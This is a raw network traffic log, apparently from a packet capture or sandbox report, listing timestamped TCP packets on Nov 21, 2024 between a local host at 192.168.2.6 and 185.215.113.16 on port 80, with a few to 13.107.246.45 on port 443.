                                                                                                                                                                              Nov 21, 2024 08:30:35.338845968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.339258909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.341918945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.341964006 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.342076063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.344990969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.345041037 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.345318079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.348058939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.348073959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.348112106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.351177931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.351214886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.351248026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.354343891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.354398966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.354482889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.357213020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.357248068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.357265949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.360220909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.360275984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.360358953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.363228083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.363282919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.363398075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.366260052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.366312981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.366390944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.368973970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.369029045 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.369048119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.372658014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.372694016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.372741938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.375557899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.375621080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.375696898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.378674984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.378710985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.378727913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.381244898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.381302118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.381373882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.384426117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.384459972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.384480000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.387382030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.387424946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.387480021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.390433073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.390490055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.390528917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.393532038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.393575907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.393579006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.396589041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.396631956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.396699905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.399681091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.399722099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.399883986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.402750969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.402812958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.402838945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.405813932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.405853033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.405945063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.408874989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.408922911 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.408972025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.412081003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.412127972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.464762926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.464801073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.465007067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.466810942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.466826916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.466913939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.468242884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.469136953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.469172001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.469192028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.474503994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.474520922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.474560976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.474989891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.475004911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.475043058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.476176023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.476226091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.476275921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.478527069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.478542089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.478575945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.480771065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.480825901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.480851889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.482994080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.483042955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.483102083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.485167980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.485219955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.485265970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.487329006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.487389088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.487452030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.489428043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.489480019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.489523888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494420052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494440079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494467974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.494657993 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494760990 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494824886 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.494955063 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.494975090 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.494985104 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.494991064 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.495091915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.495107889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.495131969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.497338057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.497351885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.497400999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.498539925 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.498588085 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.498666048 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.498869896 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.498888969 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.499339104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.499385118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.499515057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.501288891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.501348019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.501419067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.503351927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.503412008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.503479958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.505494118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.505511999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.505546093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.507220984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.507270098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.507407904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.509804010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.509862900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.509953976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.512700081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.512753010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.512864113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.514426947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.514440060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.514488935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.515441895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.515497923 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.515603065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517052889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517107964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.517196894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517522097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517534971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517559052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.517792940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.517836094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.517846107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.518846035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.518892050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.519041061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.519973993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.520024061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.520117998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.521073103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.521121025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.521198034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.522119999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.522133112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.522166014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.525060892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.525074959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.525088072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.525100946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.525120020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.525171995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.525422096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.525465012 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.525547981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.526469946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.526510000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.526590109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.527533054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.527584076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.527636051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.528594971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.528636932 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.528707981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.529670000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.529721022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.529771090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.530750036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.530800104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.530859947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.531831980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.531873941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.531874895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.532907009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.532952070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.533013105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.533997059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.534043074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.534090042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.535079956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.535125971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.535203934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.536175013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.536221981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.536303997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.537235022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.537286997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.537353992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.538325071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.538369894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.538398027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.539383888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.539432049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.539493084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.540472984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.540518999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.540534973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.541567087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.541627884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.541768074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.542592049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.542650938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.542690039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.543688059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.543742895 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.543785095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.544744015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.544795036 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.544835091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.545831919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.545888901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.545916080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.591481924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.666361094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.666435957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.666522980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.666744947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.666850090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.666893959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.667593956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.667767048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.667838097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.668569088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.668629885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.668673038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.669348955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.669513941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.669553995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.670250893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.670386076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.670423985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.671113968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.671191931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.671235085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.672008038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.672127962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.672172070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.672883034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.672981024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.673022985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.673753023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.673882008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.673927069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.674644947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.674751997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.674793959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.675539970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.675651073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.675693035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.676441908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.676527977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.676569939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.677299023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.677481890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.677525997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.678189039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.678313017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.678354025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.679084063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.679191113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.679229021 CET4976280192.168.2.6185.215.113.16
